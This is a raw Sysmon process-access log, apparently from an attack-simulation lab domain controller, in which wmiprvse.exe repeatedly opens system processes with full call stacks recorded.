15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025239Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025238Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025237Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025236Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025235Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025234Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025233Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025232Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025231Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025230Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025229Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025228Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.085{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025227Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 